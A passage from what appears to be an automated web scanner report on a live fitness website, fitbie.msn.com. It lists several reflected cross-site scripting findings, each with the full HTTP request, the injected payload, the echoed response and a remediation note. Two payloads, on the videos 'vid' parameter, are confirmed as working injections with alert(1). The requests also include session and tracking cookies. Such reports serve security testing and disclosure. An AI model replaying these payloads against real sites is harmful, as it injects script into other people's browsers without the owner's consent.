fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:32 +0000
ETag: "1297607192-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:33 GMT
Date: Sun, 13 Feb 2011 14:26:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default14ef8';e86b01acd7a?destination=node%2Fdefault14ef8';e86b01acd7a&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.114. http://fitbie.msn.com/sites/default/files/yoga-strength-move-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/yoga-strength-move-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4626'%3b35eade3c06e was submitted in the REST URL parameter 2. This input was echoed as c4626';35eade3c06e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultc4626'%3b35eade3c06e/files/yoga-strength-move-th.jpg?1294859816 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:57 +0000
ETag: "1297607397-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:57 GMT
Date: Sun, 13 Feb 2011 14:29:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultc4626';35eade3c06e?destination=node%2Fdefaultc4626';35eade3c06e&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.115. http://fitbie.msn.com/slideshow/10-grab-and-go-fitness-foods [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /slideshow/10-grab-and-go-fitness-foods

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4043'%3bfb9ffbe10af was submitted in the REST URL parameter 2. This input was echoed as a4043';fb9ffbe10af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /slideshow/10-grab-and-go-fitness-foodsa4043'%3bfb9ffbe10af HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:23 +0000
ETag: "1297607723-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:23 GMT
Date: Sun, 13 Feb 2011 14:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/10-grab-and-go-fitness-foodsa4043';fb9ffbe10af?destination=node%2F10-grab-and-go-fitness-foodsa4043';fb9ffbe10af&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.116. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /slideshow/12-ways-make-water-less-boring

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4fc4'%3bf93e0f8f12d was submitted in the REST URL parameter 2. This input was echoed as f4fc4';f93e0f8f12d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /slideshow/12-ways-make-water-less-boringf4fc4'%3bf93e0f8f12d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:09:58 +0000
ETag: "1297458598-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Fri, 11 Feb 2011 22:09:58 GMT
Date: Fri, 11 Feb 2011 21:09:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/12-ways-make-water-less-boringf4fc4';f93e0f8f12d?destination=node%2F12-ways-make-water-less-boringf4fc4';f93e0f8f12d&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.117. http://fitbie.msn.com/taxonomy/term/117 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /taxonomy/term/117

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23170'%3b7f42a6aeb2c was submitted in the REST URL parameter 2. This input was echoed as 23170';7f42a6aeb2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /taxonomy/term23170'%3b7f42a6aeb2c/117 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_calories?height_1='&height_2='&h_unit=0&weight='&w_unit=1&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:01 +0000
ETag: "1297607761-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43199
Expires: Mon, 14 Feb 2011 02:36:01 GMT
Date: Sun, 13 Feb 2011 14:36:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/term23170';7f42a6aeb2c?destination=node%2Fterm23170';7f42a6aeb2c&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.118. http://fitbie.msn.com/user/login [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /user/login

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b63b9'%3ba65ecff8ac9 was submitted in the REST URL parameter 2. This input was echoed as b63b9';a65ecff8ac9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/loginb63b9'%3ba65ecff8ac9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:53 +0000
ETag: "1297607813-1"
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Feb 2011 14:36:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:36:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/loginb63b9';a65ecff8ac9?destination=node%2Floginb63b9';a65ecff8ac9&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.119. http://fitbie.msn.com/videos [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /videos

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec297"%3balert(1)//7610d283477 was submitted in the vid parameter. This input was echoed as ec297";alert(1)//7610d283477 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videos?vid=ec297"%3balert(1)//7610d283477 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:08 +0000
ETag: "1297607828-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43200
Expires: Mon, 14 Feb 2011 02:37:08 GMT
Date: Sun, 13 Feb 2011 14:37:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
'CustomPlayer', 950, 980, {"configCsid": "Rodale", "configName": "Rodale_Home-Health_Hub", "player.linkoverride": "http://fitbie.msn.com/videos/?vid=", "player.ap": "true", "player.c":"v","player.v": "ec297";alert(1)//7610d283477","gallery.linkback": "http://fitbie.msn.com/videos", "gallery.linkbackText": "More videos from Fitbie" }, 'CustomPlayer1');</script>
...[SNIP]...

1.120. http://fitbie.msn.com/videos/ [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /videos/

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5226"%3balert(1)//408672e6c4f was submitted in the vid parameter. This input was echoed as b5226";alert(1)//408672e6c4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videos/?vid=b5226"%3balert(1)//408672e6c4f HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:19 +0000
ETag: "1297607839-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43200
Expires: Mon, 14 Feb 2011 02:37:20 GMT
Date: Sun, 13 Feb 2011 14:37:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
'CustomPlayer', 950, 980, {"configCsid": "Rodale", "configName": "Rodale_Home-Health_Hub", "player.linkoverride": "http://fitbie.msn.com/videos/?vid=", "player.ap": "true", "player.c":"v","player.v": "b5226";alert(1)//408672e6c4f","gallery.linkback": "http://fitbie.msn.com/videos", "gallery.linkbackText": "More videos from Fitbie" }, 'CustomPlayer1');</script>
...[SNIP]...

1.121. http://fitbie.msn.com/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /weight-loss-basics/tips/6-happiest-ways-beat-belly-fat

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e60e'%3bb39761af491 was submitted in the REST URL parameter 2. This input was echoed as 9e60e';b39761af491 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

